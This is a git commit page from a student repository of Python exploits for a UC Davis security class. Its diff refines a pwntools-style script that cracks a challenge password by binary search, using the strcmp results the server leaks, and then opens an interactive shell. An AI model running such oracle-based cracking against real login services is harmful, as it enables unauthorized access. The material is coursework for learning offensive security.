ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m
git clone git://git.figbert.com/ucdavis-ecs189m.git
Log | Files | Refs
commit 3ced9e44a3cfa46469866946ca9b3aa3b2ba41a0
parent 24ca40b1505424367bc65d8ebff4c8675ee83a23
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Sun, 13 Oct 2019 00:10:34 -0700

Completed third_flag.py, updated .gitignore

Diffstat:

M.gitignore | 2++


Mthird_flag.py | 19++++++++++++-------


2 files changed, 14 insertions(+), 7 deletions(-)

diff --git a/.gitignore b/.gitignore
@@ -1 +1,2 @@
 .DS_Store
+__pycache__
+\ No newline at end of file
diff --git a/third_flag.py b/third_flag.py
@@ -7,7 +7,7 @@ def str_to_dec(s: str) -> int:
         lst.append(val*(26**pos))
     return sum(lst)
 
-def dec_to_str(num: int, max: str = 19) -> str:
+def dec_to_str(num: int, max: int = 19) -> str:
     st = ""
     for a in range(max,0,-1):
         digit = int(num/(26**a)) if int(num/(26**a)) <= 25 else 25
@@ -18,8 +18,8 @@ def dec_to_str(num: int, max: str = 19) -> str:
     st += char  
     return st
 
-def passgen(low: str, high: str) -> str:
-    return dec_to_str((str_to_dec(low)+str_to_dec(high))/2)
+def passgen(low: str, high: str, size: int = 19) -> str:
+    return dec_to_str((str_to_dec(low)+str_to_dec(high))/2, size)
 
 cracked = False
 len_limit = False
@@ -50,6 +50,7 @@ while not cracked:
             cracked = True
             conn.interactive()
         if password == previous_pass:
+            print("Server response:\n{}\n".format(response))
             break
         print("Server response:\n{}\n".format(response))
         conn.sendline(password)
@@ -66,19 +67,23 @@ HI = HI[start_pos:]
 LO = LO[start_pos:]
 first = True
 while not cracked:
-    previous_pass = password
     if b" -1 " in response:
         LO = password[start_pos:]
-        password = pass_buffer + passgen(LO, HI)
+        pass_end = passgen(LO, HI, len(HI)-1)
+        password = pass_buffer + pass_end
     elif b" 1 " in response:
         HI = password[start_pos:]
-        password = pass_buffer + passgen(LO, HI)
+        pass_end = passgen(LO, HI, len(HI)-1)
+        password = pass_buffer + pass_end
     else:
         print("Password cracked as: {}".format(password))
         cracked = True
         conn.interactive()
     conn.sendline(password)
     print("Attempt {}:\nPass sent as:\n{}\nPrevious Pass: {}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, previous_pass, password, LO, HI))
-    response = conn.recvline_contains(b"strcmp")
+    try:
+        response = conn.recvline_contains(b"strcmp")
+    except:
+        response = conn.recv()
     print("Server response:\n{}\n".format(response))
     attempt += 1
 \ No newline at end of file